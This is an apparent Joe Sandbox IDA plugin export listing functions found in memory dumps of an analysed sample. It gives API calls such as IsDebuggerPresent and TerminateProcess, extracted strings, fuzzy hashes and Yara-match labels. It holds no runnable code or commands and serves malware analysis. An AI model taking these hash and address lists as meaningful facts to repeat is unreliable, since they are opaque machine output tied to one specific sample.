Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: w{$`7`w$my]w$*/m
API String ID: 0-1494362185
Opcode ID: 7c2d2f8e0e80ca876452b78703f4ae7cc804f8e75a073b5138cbcfe664197018
Instruction ID: 5c5359cfd2c73b73d9782bdc70294bfee9b1fa966dcf230bc82c4975a829768d
Opcode Fuzzy Hash: 7c2d2f8e0e80ca876452b78703f4ae7cc804f8e75a073b5138cbcfe664197018
Instruction Fuzzy Hash: E382E8F3A0C2009FE7046E2DDC8567ABBE9EF94720F16893DE6C5C3744EA3598058697

Function 04B59A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B59A25
IsDebuggerPresent.KERNEL32 ref: 04B59AF1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B59B11
UnhandledExceptionFilter.KERNEL32(?), ref: 04B59B1B

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction ID: dfdd5ba5d5d5445a28c7a1b5586aae3e7d6ef734e66efb1d37dff2e1a02ae5d0
Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction Fuzzy Hash: 4431FAB5D0521CDBDB10DF64D9897CCBBB8BF08304F1041EAE409A7250EB715A85DF45

Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
IsDebuggerPresent.KERNEL32 ref: 0040988A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49

Function 04D02070 Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

@,@, xrefs: 04D02259
0,@, xrefs: 04D02252
`,@, xrefs: 04D02260
@, xrefs: 04D0208F

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: 0,@$@$@,@$`,@
API String ID: 0-1654315312
Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
Instruction ID: 94b866f110e91aab5e3c397b57d64e23afc9ee43eabaf952970047ed8b373fd7
Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
Instruction Fuzzy Hash: A1127C71B022159BDB14CFA8D984BADB7B1FF48304F1481AAE909AB385D775FC41CBA4

Function 009924EC Relevance: 5.4, Strings: 3, Instructions: 1624COMMON

Download Yara Rule

Strings

B">, xrefs: 00993208
znz[, xrefs: 009927DB
r3., xrefs: 00992FC6

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: B">$r3.$znz[
API String ID: 0-2397052208
Opcode ID: 0f45e4a7676e02ec6251fe3252eb88dc0706122563473332462a75ada9e7e3d9
Instruction ID: 81baf118b2a1bd547d88578c1bffae88354255e5e9be8a16ff7ba0379b0f608a
Opcode Fuzzy Hash: 0f45e4a7676e02ec6251fe3252eb88dc0706122563473332462a75ada9e7e3d9
Instruction Fuzzy Hash: E8B207F360C204AFE714AE29EC8577ABBE5EF98320F168A3DE6C4C3744E63558058657

Function 04B5C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B5C412
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B5C41C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B5C429

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction ID: a82941ff1ab15166b792db7cf0a9715c62ed758552e61d8106de27d289b9f23f
Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction Fuzzy Hash: F33187B59012289BCB21DF68D9887DDBBB4BF08314F5041EAE81CA7260E7749B858F45

Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49

Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
ExitProcess.KERNEL32 ref: 10005F60

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41

Function 04B5F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,04B5F173,00000000,0041D0A0,?,00000000,?,04B61714), ref: 04B5F196
TerminateProcess.KERNEL32(00000000,?,04B5F173,00000000,0041D0A0,?,00000000,?,04B61714), ref: 04B5F19D
ExitProcess.KERNEL32 ref: 04B5F1AF

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: fecdb4d13c6fab5794166d31b669ab8f10eaeaadc575efdef99003bf132c9f7e
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 8AE04671440108AFDB117F14DC08B98BB68FF40285F004060FC0586230CB3AE991CB80

Function 00995A5B Relevance: 4.1, Strings: 2, Instructions: 1616COMMON

Download Yara Rule

Strings

gA0, xrefs: 00996241
T?O, xrefs: 009969AB

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: T?O$gA0
API String ID: 0-2239796124
Opcode ID: 03960bf0b81e0bbc5a27f33a7f1be1b01246cb12c33fe9329b8a38ce964e5444
Instruction ID: 35db8a4dc97828cf802802b9e405cb215f6f5894c952252db2018279b924f3bc
Opcode Fuzzy Hash: 03960bf0b81e0bbc5a27f33a7f1be1b01246cb12c33fe9329b8a38ce964e5444
Instruction Fuzzy Hash: 7BB2E3B3A0C200AFE3046E2DEC4567ABBE9EF94720F16493DEAC4C7744EA3558458797

Function 00984D45 Relevance: 4.1, Strings: 2, Instructions: 1616COMMON

Download Yara Rule

Strings

\KJ9, xrefs: 0098583B
\!?=, xrefs: 009851A7

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: \!?=$\KJ9
API String ID: 0-1035628980
Opcode ID: bde8680f78068eb95ba757965e3a2a03488880bd3180b9d7c5c594ac92517e67
Instruction ID: f4c86c6c58bf5b48af2a9b88cbefba5216e42da10a446d07dc5f5b2663cab437
Opcode Fuzzy Hash: bde8680f78068eb95ba757965e3a2a03488880bd3180b9d7c5c594ac92517e67
Instruction Fuzzy Hash: C5B22AF3A0C200AFE704AE2DEC8577ABBE5EF98760F16453DEAC5D3744E63558008696

Function 04B5092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 04B5095F
l, xrefs: 04B50966
GetProcAddress., xrefs: 04B509DC, 04B509DF, 04B509E4

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 4de6485bf74011bf796b56fbb2e865805ccd799282971c35517f1f1da47f014d
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 5E3128B6900609DFEB10DF99C880BAEFBF5FF48324F15408AD941A7264D771EA45CBA4

Function 04D0E720 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: 03c61b27175f4b62295d1662453407682b502c8526af15da555761418385712d
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: ADF12D71E012199FDF14CFA9D9907AEBBF1FF88314F158669D819AB384D731AA01CB90

Function 04B5F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: 4c36ee0b59cad29dc8c891e68949e655a3cab7557f15993b653628064c2345d8
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: 88F11C71E006199FDF14CFA9D880BADFBB1EF88314F1582A9D919EB354D731AA41CB90

Function 0040F320 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94

Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40

Function 04B63F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B63F48,?,?,00000008,?,?,04B6AB25,00000000), ref: 04B6417A

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: 21d2339592113c717964aa90c13b246190a6ef4df263d7cbe9ac312b9673ad12
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: 4DB16E35210A04DFDB15CF28C486B657BE1FF45365F258698E89ACF2A2C339E992CF44

Function 00413CE6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44

Function 04B59BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409955,04B597B6), ref: 04B59BB5

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction Fuzzy Hash:

Function 00409949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction Fuzzy Hash:

Function 04D0C7DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04D0C959

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: 9d249414a80b21292162d5131e903c42b58814b0b7fc485fcdb6e4c4c7c58278
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 165137707246485AFB3C8DA894947BE679AFF02F04F04C31AD4C2D72C1E651F945936A

Function 04D0CA0F Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04D0CB8B

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction ID: ab7d6a44a69462f6c90c9f01aa4c2233eaf6f2a82ba3dcaaed86bc5010e9812f
Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction Fuzzy Hash: 4F514470770748A6EB3CCA6888947BE679AFB06F08F04C31ED486D72C0E611F949D366

Function 04B5D644 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04B5D7C0

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: 0d7b19e5ca356b217503e7086ff03d876f4ae3239fcb8fabfba853532498cc18
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 0B51587030074896EB399B2888947BEF79EDB41304F04C7DECC8ADB2B1E655F9468B56

Function 04B5D876 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 04B5D9F2

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction ID: 62bad86e675b6c37203008022940c9b04fc941bc07d0198af922ffa9042b7050
Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction Fuzzy Hash: CA517D3060474896EB389E6888947BEE79EDB92308F48C7DDCD82DB2F0D651F946C352

Function 0040D3DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0040D559

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E

Function 0040D60F Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0040D78B

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E

Function 0081CB17 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

G47n, xrefs: 0081CC5A

Memory Dump Source

Source File: 00000000.00000002.2660197534.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: G47n
API String ID: 0-1055399615
Opcode ID: a0aac008ea0e53ce7e5c7ef00ef0c5a4bac89bd09f02033641a2e34e19b7d90f
Instruction ID: 7ea28e536454f73ee891fd598156ac1082e80e18a6041b8d262d1cc82f926482
Opcode Fuzzy Hash: a0aac008ea0e53ce7e5c7ef00ef0c5a4bac89bd09f02033641a2e34e19b7d90f
Instruction Fuzzy Hash: 7531F07668821E8BDB10CF29C4422EF37A5FFA6335B14412AD846C7A02D6A24D95DFCD

Function 04D137F9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction ID: 6626d86052a0a4c301a4ef36dc0924e8c9523f023de7cf3e97f8057f1a809739
Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction Fuzzy Hash: 53322621E69F415DE7239634E822335A298AFB73C5F55D737FC1AB5DA6EB28D0834100

Function 004143F9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108

Function 04D130E6 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: 4e8f898ad6c7dfef9bccb2217b49076e2ae77a9162e04f4a1370b7330831d462
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: CFB12A31610608EFEB19CF28D48AA657BE0FF45364F258658EC9ACF2B1C735E991CB44

